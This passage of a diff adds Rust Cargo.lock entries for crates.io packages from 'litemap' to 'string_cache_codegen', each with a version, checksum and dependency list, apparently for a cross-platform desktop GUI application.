+source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e02f3bb43d335493c96bf3fd3a321600bf6bd07ed34bc64118e9293bdffea46c" +dependencies = [ + "libc", +] + +[[package]] +name = "litemap" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "92daf443525c4cce67b150400bc2316076100ce0b3686209eb8cf3c31612e6f0" + +[[package]] +name = "lock_api" +version = "0.4.14" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "224399e74b87b5f3557511d98dff8b14089b3dadafcab6bb93eab67d3aace965" +dependencies = [ + "scopeguard", +] + +[[package]] +name = "log" +version = "0.4.29" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" + +[[package]] +name = "markup5ever" +version = "0.38.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8983d30f2915feeaaab2d6babdd6bc7e9ed1a00b66b5e6d74df19aa9c0e91862" +dependencies = [ + "log", + "tendril", + "web_atoms", +] + +[[package]] +name = "memchr" +version = "2.8.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f8ca58f447f06ed17d5fc4043ce1b10dd205e060fb3ce5b979b8ed8e59ff3f79" + +[[package]] +name = "memoffset" +version = "0.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "488016bfae457b036d996092f6cb448677611ce4449e970ceaf42695203f218a" +dependencies = [ + "autocfg", +] + +[[package]] +name = "mime" +version = "0.3.17" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6877bb514081ee2a7ff5ef9de3281f14a4dd4bceac4c09388074a6b5df8a139a" + +[[package]] +name = "miniz_oxide" +version = "0.8.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1fa76a2c86f704bdb222d66965fb3d63269ce38518b83cb0575fca855ebb6316" +dependencies = [ + "adler2", + "simd-adler32", +] + +[[package]] +name = "mio" +version = "1.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "50b7e5b27aa02a74bac8c3f23f448f8d87ff11f92d3aac1a6ed369ee08cc56c1" +dependencies = [ + "libc", + "wasi", + "windows-sys 0.61.2", +] + +[[package]] +name = "muda" +version = "0.19.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0ae8844f63b5b118e334e205585b8c5c17b984121dbdb179d44aeb087ffad3cb" +dependencies = [ + "crossbeam-channel", + "dpi", + "gtk", + "keyboard-types", + "objc2", + "objc2-app-kit", + "objc2-core-foundation", + "objc2-foundation", + "once_cell", + "png 0.18.1", + "serde", + "thiserror 2.0.18", + "windows-sys 0.61.2", +] + +[[package]] +name = "ndk" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c3f42e7bbe13d351b6bead8286a43aac9534b82bd3cc43e47037f012ebfd62d4" +dependencies = [ + "bitflags 2.11.1", + "jni-sys 0.3.1", + "log", + "ndk-sys", + "num_enum", + "raw-window-handle", + "thiserror 1.0.69", +] + +[[package]] +name = "ndk-sys" +version = "0.6.0+11769913" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ee6cda3051665f1fb8d9e08fc35c96d5a244fb1be711a03b71118828afc9a873" +dependencies = [ + "jni-sys 0.3.1", +] + +[[package]] +name = "new_debug_unreachable" +version = "1.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "650eef8c711430f1a879fdd01d4745a7deea475becfb90269c06775983bbf086" + +[[package]] +name = "num-conv" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c6673768db2d862beb9b39a78fdcb1a69439615d5794a1be50caa9bc92c81967" + +[[package]] +name = "num-traits" +version = "0.2.19" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841" +dependencies = [ + "autocfg", +] + +[[package]] +name = "num_enum" +version = "0.7.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5d0bca838442ec211fa11de3a8b0e0e8f3a4522575b5c4c06ed722e005036f26" +dependencies = [ + "num_enum_derive", + "rustversion", +] + +[[package]] +name = "num_enum_derive" +version = "0.7.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "680998035259dcfcafe653688bf2aa6d3e2dc05e98be6ab46afb089dc84f1df8" +dependencies = [ + "proc-macro-crate 3.5.0", + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "objc2" +version = "0.6.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3a12a8ed07aefc768292f076dc3ac8c48f3781c8f2d5851dd3d98950e8c5a89f" +dependencies = [ + "objc2-encode", + "objc2-exception-helper", +] + +[[package]] +name = "objc2-app-kit" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d49e936b501e5c5bf01fda3a9452ff86dc3ea98ad5f283e1455153142d97518c" +dependencies = [ + "bitflags 2.11.1", + "block2", + "objc2", + "objc2-core-foundation", + "objc2-foundation", +] + +[[package]] +name = "objc2-cloud-kit" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "73ad74d880bb43877038da939b7427bba67e9dd42004a18b809ba7d87cee241c" +dependencies = [ + "bitflags 2.11.1", + "objc2", + "objc2-foundation", +] + +[[package]] +name = "objc2-core-data" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0b402a653efbb5e82ce4df10683b6b28027616a2715e90009947d50b8dd298fa" +dependencies = [ + "objc2", + "objc2-foundation", +] + +[[package]] +name = "objc2-core-foundation" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2a180dd8642fa45cdb7dd721cd4c11b1cadd4929ce112ebd8b9f5803cc79d536" +dependencies = [ + "bitflags 2.11.1", + "dispatch2", + "objc2", +] + +[[package]] +name = "objc2-core-graphics" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e022c9d066895efa1345f8e33e584b9f958da2fd4cd116792e15e07e4720a807" +dependencies = [ + "bitflags 2.11.1", + "dispatch2", + "objc2", + "objc2-core-foundation", + "objc2-io-surface", +] + +[[package]] +name = "objc2-core-image" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e5d563b38d2b97209f8e861173de434bd0214cf020e3423a52624cd1d989f006" +dependencies = [ + "objc2", + "objc2-foundation", +] + +[[package]] +name = "objc2-core-location" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ca347214e24bc973fc025fd0d36ebb179ff30536ed1f80252706db19ee452009" +dependencies = [ + "objc2", + "objc2-foundation", +] + +[[package]] +name = "objc2-core-text" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0cde0dfb48d25d2b4862161a4d5fcc0e3c24367869ad306b0c9ec0073bfed92d" +dependencies = [ + "bitflags 2.11.1", + "objc2", + "objc2-core-foundation", + "objc2-core-graphics", +] + +[[package]] +name = "objc2-encode" +version = "4.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ef25abbcd74fb2609453eb695bd2f860d389e457f67dc17cafc8b8cbc89d0c33" + +[[package]] +name = "objc2-exception-helper" +version = "0.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c7a1c5fbb72d7735b076bb47b578523aedc40f3c439bea6dfd595c089d79d98a" +dependencies = [ + "cc", +] + +[[package]] +name = "objc2-foundation" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e3e0adef53c21f888deb4fa59fc59f7eb17404926ee8a6f59f5df0fd7f9f3272" +dependencies = [ + "bitflags 2.11.1", + "block2", + "objc2", + "objc2-core-foundation", +] + +[[package]] +name = "objc2-io-surface" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "180788110936d59bab6bd83b6060ffdfffb3b922ba1396b312ae795e1de9d81d" +dependencies = [ + "bitflags 2.11.1", + "objc2", + "objc2-core-foundation", +] + +[[package]] +name = "objc2-quartz-core" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96c1358452b371bf9f104e21ec536d37a650eb10f7ee379fff67d2e08d537f1f" +dependencies = [ + "bitflags 2.11.1", + "objc2", + "objc2-core-foundation", + "objc2-foundation", +] + +[[package]] +name = "objc2-ui-kit" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d87d638e33c06f577498cbcc50491496a3ed4246998a7fbba7ccb98b1e7eab22" +dependencies = [ + "bitflags 2.11.1", + "block2", + "objc2", + "objc2-cloud-kit", + "objc2-core-data", + "objc2-core-foundation", + "objc2-core-graphics", + "objc2-core-image", + "objc2-core-location", + "objc2-core-text", + "objc2-foundation", + "objc2-quartz-core", + "objc2-user-notifications", +] + +[[package]] +name = "objc2-user-notifications" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9df9128cbbfef73cda168416ccf7f837b62737d748333bfe9ab71c245d76613e" +dependencies = [ + "objc2", + "objc2-foundation", +] + +[[package]] +name = "objc2-web-kit" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b2e5aaab980c433cf470df9d7af96a7b46a9d892d521a2cbbb2f8a4c16751e7f" +dependencies = [ + "bitflags 2.11.1", + "block2", + "objc2", + "objc2-app-kit", + "objc2-core-foundation", + "objc2-foundation", +] + +[[package]] +name = "once_cell" +version = "1.21.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50" + +[[package]] +name = "option-ext" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "04744f49eae99ab78e0d5c0b603ab218f515ea8cfe5a456d7629ad883a3b6e7d" + +[[package]] +name = "pango" +version = "0.18.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7ca27ec1eb0457ab26f3036ea52229edbdb74dee1edd29063f5b9b010e7ebee4" +dependencies = [ + "gio", + "glib", + "libc", + "once_cell", + "pango-sys", +] + +[[package]] +name = "pango-sys" +version = "0.18.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "436737e391a843e5933d6d9aa102cb126d501e815b83601365a948a518555dc5" +dependencies = [ + "glib-sys", + "gobject-sys", + "libc", + "system-deps", +] + +[[package]] +name = "parking_lot" +version = "0.12.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "93857453250e3077bd71ff98b6a65ea6621a19bb0f559a85248955ac12c45a1a" +dependencies = [ + "lock_api", + "parking_lot_core", +] + +[[package]] +name = "parking_lot_core" +version = "0.9.12" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2621685985a2ebf1c516881c026032ac7deafcda1a2c9b7850dc81e3dfcb64c1" +dependencies = [ + "cfg-if", + "libc", + "redox_syscall", + "smallvec", + "windows-link 0.2.1", +] + +[[package]] +name = "percent-encoding" +version = "2.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9b4f627cb1b25917193a259e49bdad08f671f8d9708acfd5fe0a8c1455d87220" + +[[package]] +name = "phf" +version = "0.13.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c1562dc717473dbaa4c1f85a36410e03c047b2e7df7f45ee938fbef64ae7fadf" +dependencies = [ + "phf_macros", + "phf_shared", + "serde", +] + +[[package]] +name = "phf_codegen" +version = "0.13.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "49aa7f9d80421bca176ca8dbfebe668cc7a2684708594ec9f3c0db0805d5d6e1" +dependencies = [ + "phf_generator", + "phf_shared", +] + +[[package]] +name = "phf_generator" +version = "0.13.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "135ace3a761e564ec88c03a77317a7c6b80bb7f7135ef2544dbe054243b89737" +dependencies = [ + "fastrand", + "phf_shared", +] + +[[package]] +name = "phf_macros" +version = "0.13.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "812f032b54b1e759ccd5f8b6677695d5268c588701effba24601f6932f8269ef" +dependencies = [ + "phf_generator", + "phf_shared", + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "phf_shared" +version = "0.13.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e57fef6bc5981e38c2ce2d63bfa546861309f875b8a75f092d1d54ae2d64f266" +dependencies = [ + "siphasher", +] + +[[package]] +name = "pin-project-lite" +version = "0.2.17" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a89322df9ebe1c1578d689c92318e070967d1042b512afbe49518723f4e6d5cd" + +[[package]] +name = "pkg-config" +version = "0.3.33" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "19f132c84eca552bf34cab8ec81f1c1dcc229b811638f9d283dceabe58c5569e" + +[[package]] +name = "plist" +version = "1.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "092791278e026273c1b65bbdcfbba3a300f2994c896bd01ab01da613c29c46f1" +dependencies = [ + "base64 0.22.1", + "indexmap 2.14.0", + "quick-xml", + "serde", + "time", +] + +[[package]] +name = "png" +version = "0.17.16" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "82151a2fc869e011c153adc57cf2789ccb8d9906ce52c0b39a6b5697749d7526" +dependencies = [ + "bitflags 1.3.2", + "crc32fast", + "fdeflate", + "flate2", + "miniz_oxide", +] + +[[package]] +name = "png" +version = "0.18.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "60769b8b31b2a9f263dae2776c37b1b28ae246943cf719eb6946a1db05128a61" +dependencies = [ + "bitflags 2.11.1", + "crc32fast", + "fdeflate", + "flate2", + "miniz_oxide", +] + +[[package]] +name = "potential_utf" +version = "0.1.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0103b1cef7ec0cf76490e969665504990193874ea05c85ff9bab8b911d0a0564" +dependencies = [ + "zerovec", +] + +[[package]] +name = "powerfmt" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391" + +[[package]] +name = "precomputed-hash" +version = "0.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "925383efa346730478fb4838dbe9137d2a47675ad789c546d150a6e1dd4ab31c" + +[[package]] +name = "prettyplease" +version = "0.2.37" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "479ca8adacdd7ce8f1fb39ce9ecccbfe93a3f1344b3d0d97f20bc0196208f62b" +dependencies = [ + "proc-macro2", + "syn 2.0.117", +] + +[[package]] +name = "proc-macro-crate" +version = "1.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7f4c021e1093a56626774e81216a4ce732a735e5bad4868a03f3ed65ca0c3919" +dependencies = [ + "once_cell", + "toml_edit 0.19.15", +] + +[[package]] +name = "proc-macro-crate" +version = "2.0.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b00f26d3400549137f92511a46ac1cd8ce37cb5598a96d382381458b992a5d24" +dependencies = [ + "toml_datetime 0.6.3", + "toml_edit 0.20.2", +] + +[[package]] +name = "proc-macro-crate" +version = "3.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e67ba7e9b2b56446f1d419b1d807906278ffa1a658a8a5d8a39dcb1f5a78614f" +dependencies = [ + "toml_edit 0.25.11+spec-1.1.0", +] + +[[package]] +name = "proc-macro-error" +version = "1.0.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "da25490ff9892aab3fcf7c36f08cfb902dd3e71ca0f9f9517bea02a73a5ce38c" +dependencies = [ + "proc-macro-error-attr", + "proc-macro2", + "quote", + "syn 1.0.109", + "version_check", +] + +[[package]] +name = "proc-macro-error-attr" +version = "1.0.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1be40180e52ecc98ad80b184934baf3d0d29f979574e439af5a55274b35f869" +dependencies = [ + "proc-macro2", + "quote", + "version_check", +] + +[[package]] +name = "proc-macro2" +version = "1.0.106" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934" +dependencies = [ + "unicode-ident", +] + +[[package]] +name = "quick-xml" +version = "0.39.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cdcc8dd4e2f670d309a5f0e83fe36dfdc05af317008fea29144da1a2ac858e5e" +dependencies = [ + "memchr", +] + +[[package]] +name = "quote" +version = "1.0.45" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41f2619966050689382d2b44f664f4bc593e129785a36d6ee376ddf37259b924" +dependencies = [ + "proc-macro2", +] + +[[package]] +name = "r-efi" +version = "5.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f" + +[[package]] +name = "r-efi" +version = "6.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f8dcc9c7d52a811697d2151c701e0d08956f92b0e24136cf4cf27b57a6a0d9bf" + +[[package]] +name = "raw-window-handle" +version = "0.6.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "20675572f6f24e9e76ef639bc5552774ed45f1c30e2951e1e99c59888861c539" + +[[package]] +name = "redox_syscall" +version = "0.5.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ed2bf2547551a7053d6fdfafda3f938979645c44812fbfcda098faae3f1a362d" +dependencies = [ + "bitflags 2.11.1", +] + +[[package]] +name = "redox_users" +version = "0.5.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a4e608c6638b9c18977b00b475ac1f28d14e84b27d8d42f70e0bf1e3dec127ac" +dependencies = [ + "getrandom 0.2.17", + "libredox", + "thiserror 2.0.18", +] + +[[package]] +name = "ref-cast" +version = "1.0.25" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f354300ae66f76f1c85c5f84693f0ce81d747e2c3f21a45fef496d89c960bf7d" +dependencies = [ + "ref-cast-impl", +] + +[[package]] +name = "ref-cast-impl" +version = "1.0.25" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b7186006dcb21920990093f30e3dea63b7d6e977bf1256be20c3563a5db070da" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "regex" +version = "1.12.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e10754a14b9137dd7b1e3e5b0493cc9171fdd105e0ab477f51b72e7f3ac0e276" +dependencies = [ + "aho-corasick", + "memchr", + "regex-automata", + "regex-syntax", +] + +[[package]] +name = "regex-automata" +version = "0.4.14" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6e1dd4122fc1595e8162618945476892eefca7b88c52820e74af6262213cae8f" +dependencies = [ + "aho-corasick", + "memchr", + "regex-syntax", +] + +[[package]] +name = "regex-syntax" +version = "0.8.10" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dc897dd8d9e8bd1ed8cdad82b5966c3e0ecae09fb1907d58efaa013543185d0a" + +[[package]] +name = "reqwest" +version = "0.13.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "62e0021ea2c22aed41653bc7e1419abb2c97e038ff2c33d0e1309e49a97deec0" +dependencies = [ + "base64 0.22.1", + "bytes", + "futures-core", + "futures-util", + "http", + "http-body", + "http-body-util", + "hyper", + "hyper-util", + "js-sys", + "log", + "percent-encoding", + "pin-project-lite", + "serde", + "serde_json", + "sync_wrapper", + "tokio", + "tokio-util", + "tower", + "tower-http", + "tower-service", + "url", + "wasm-bindgen", + "wasm-bindgen-futures", + "wasm-streams", + "web-sys", +] + +[[package]] +name = "rustc-hash" +version = "2.1.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "94300abf3f1ae2e2b8ffb7b58043de3d399c73fa6f4b73826402a5c457614dbe" + +[[package]] +name = "rustc_version" +version = "0.4.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cfcb3a22ef46e85b45de6ee7e79d063319ebb6594faafcf1c225ea92ab6e9b92" +dependencies = [ + "semver", +] + +[[package]] +name = "rustversion" +version = "1.0.22" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" + +[[package]] +name = "same-file" +version = "1.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" +dependencies = [ + "winapi-util", +] + +[[package]] +name = "schemars" +version = "0.8.22" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3fbf2ae1b8bc8e02df939598064d22402220cd5bbcca1c76f7d6a310974d5615" +dependencies = [ + "dyn-clone", + "indexmap 1.9.3", + "schemars_derive", + "serde", + "serde_json", + "url", + "uuid 1.23.1", +] + +[[package]] +name = "schemars" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4cd191f9397d57d581cddd31014772520aa448f65ef991055d7f61582c65165f" +dependencies = [ + "dyn-clone", + "ref-cast", + "serde", + "serde_json", +] + +[[package]] +name = "schemars" +version = "1.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a2b42f36aa1cd011945615b92222f6bf73c599a102a300334cd7f8dbeec726cc" +dependencies = [ + "dyn-clone", + "ref-cast", + "serde", + "serde_json", +] + +[[package]] +name = "schemars_derive" +version = "0.8.22" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "32e265784ad618884abaea0600a9adf15393368d840e0222d101a072f3f7534d" +dependencies = [ + "proc-macro2", + "quote", + "serde_derive_internals", + "syn 2.0.117", +] + +[[package]] +name = "scopeguard" +version = "1.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "94143f37725109f92c262ed2cf5e59bce7498c01bcc1502d7b9afe439a4e9f49" + +[[package]] +name = "selectors" +version = "0.36.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c5d9c0c92a92d33f08817311cf3f2c29a3538a8240e94a6a3c622ce652d7e00c" +dependencies = [ + "bitflags 2.11.1", + "cssparser", + "derive_more", + "log", + "new_debug_unreachable", + "phf", + "phf_codegen", + "precomputed-hash", + "rustc-hash", + "servo_arc", + "smallvec", +] + +[[package]] +name = "semver" +version = "1.0.28" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8a7852d02fc848982e0c167ef163aaff9cd91dc640ba85e263cb1ce46fae51cd" +dependencies = [ + "serde", + "serde_core", +] + +[[package]] +name = "serde" +version = "1.0.228" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a8e94ea7f378bd32cbbd37198a4a91436180c5bb472411e48b5ec2e2124ae9e" +dependencies = [ + "serde_core", + "serde_derive", +] + +[[package]] +name = "serde-untagged" +version = "0.1.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f9faf48a4a2d2693be24c6289dbe26552776eb7737074e6722891fadbe6c5058" +dependencies = [ + "erased-serde", + "serde", + "serde_core", + "typeid", +] + +[[package]] +name = "serde_core" +version = "1.0.228" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41d385c7d4ca58e59fc732af25c3983b67ac852c1a25000afe1175de458b67ad" +dependencies = [ + "serde_derive", +] + +[[package]] +name = "serde_derive" +version = "1.0.228" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "serde_derive_internals" +version = "0.29.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "18d26a20a969b9e3fdf2fc2d9f21eda6c40e2de84c9408bb5d3b05d499aae711" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "serde_json" +version = "1.0.149" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "83fc039473c5595ace860d8c4fafa220ff474b3fc6bfdb4293327f1a37e94d86" +dependencies = [ + "itoa", + "memchr", + "serde", + "serde_core", + "zmij", +] + +[[package]] +name = "serde_repr" +version = "0.1.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "175ee3e80ae9982737ca543e96133087cbd9a485eecc3bc4de9c1a37b47ea59c" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "serde_spanned" +version = "0.6.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bf41e0cfaf7226dca15e8197172c295a782857fcb97fad1808a166870dee75a3" +dependencies = [ + "serde", +] + +[[package]] +name = "serde_spanned" +version = "1.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6662b5879511e06e8999a8a235d848113e942c9124f211511b16466ee2995f26" +dependencies = [ + "serde_core", +] + +[[package]] +name = "serde_with" +version = "3.20.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e72c1c2cb7b223fafb600a619537a871c2818583d619401b785e7c0b746ccde2" +dependencies = [ + "base64 0.22.1", + "bs58", + "chrono", + "hex", + "indexmap 1.9.3", + "indexmap 2.14.0", + "schemars 0.9.0", + "schemars 1.2.1", + "serde_core", + "serde_json", + "serde_with_macros", + "time", +] + +[[package]] +name = "serde_with_macros" +version = "3.20.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b90c488738ecb4fb0262f41f43bc40efc5868d9fb744319ddf5f5317f417bfac" +dependencies = [ + "darling", + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "serialize-to-javascript" +version = "0.1.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "04f3666a07a197cdb77cdf306c32be9b7f598d7060d50cfd4d5aa04bfd92f6c5" +dependencies = [ + "serde", + "serde_json", + "serialize-to-javascript-impl", +] + +[[package]] +name = "serialize-to-javascript-impl" +version = "0.1.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "772ee033c0916d670af7860b6e1ef7d658a4629a6d0b4c8c3e67f09b3765b75d" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "servo_arc" +version = "0.4.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "170fb83ab34de17dc69aa7c67482b22218ddb85da56546f9bd6b929e32a05930" +dependencies = [ + "stable_deref_trait", +] + +[[package]] +name = "sha2" +version = "0.10.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283" +dependencies = [ + "cfg-if", + "cpufeatures", + "digest", +] + +[[package]] +name = "shlex" +version = "1.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" + +[[package]] +name = "simd-adler32" +version = "0.3.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "703d5c7ef118737c72f1af64ad2f6f8c5e1921f818cdcb97b8fe6fc69bf66214" + +[[package]] +name = "siphasher" +version = "1.0.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8ee5873ec9cce0195efcb7a4e9507a04cd49aec9c83d0389df45b1ef7ba2e649" + +[[package]] +name = "slab" +version = "0.4.12" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0c790de23124f9ab44544d7ac05d60440adc586479ce501c1d6d7da3cd8c9cf5" + +[[package]] +name = "smallvec" +version = "1.15.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "67b1b7a3b5fe4f1376887184045fcf45c69e92af734b7aaddc05fb777b6fbd03" + +[[package]] +name = "socket2" +version = "0.6.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3a766e1110788c36f4fa1c2b71b387a7815aa65f88ce0229841826633d93723e" +dependencies = [ + "libc", + "windows-sys 0.61.2", +] + +[[package]] +name = "softbuffer" +version = "0.4.8" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "aac18da81ebbf05109ab275b157c22a653bb3c12cf884450179942f81bcbf6c3" +dependencies = [ + "bytemuck", + "js-sys", + "ndk", + "objc2", + "objc2-core-foundation", + "objc2-core-graphics", + "objc2-foundation", + "objc2-quartz-core", + "raw-window-handle", + "redox_syscall", + "tracing", + "wasm-bindgen", + "web-sys", + "windows-sys 0.61.2", +] + +[[package]] +name = "soup3" +version = "0.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "471f924a40f31251afc77450e781cb26d55c0b650842efafc9c6cbd2f7cc4f9f" +dependencies = [ + "futures-channel", + "gio", + "glib", + "libc", + "soup3-sys", +] + +[[package]] +name = "soup3-sys" +version = "0.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7ebe8950a680a12f24f15ebe1bf70db7af98ad242d9db43596ad3108aab86c27" +dependencies = [ + "gio-sys", + "glib-sys", + "gobject-sys", + "libc", + "system-deps", +] + +[[package]] +name = "stable_deref_trait" +version = "1.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6ce2be8dc25455e1f91df71bfa12ad37d7af1092ae736f3a6cd0e37bc7810596" + +[[package]] +name = "string_cache" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a18596f8c785a729f2819c0f6a7eae6ebeebdfffbfe4214ae6b087f690e31901" +dependencies = [ + "new_debug_unreachable", + "parking_lot", + "phf_shared", + "precomputed-hash", +] + +[[package]] +name = "string_cache_codegen" +version = "0.6.1" 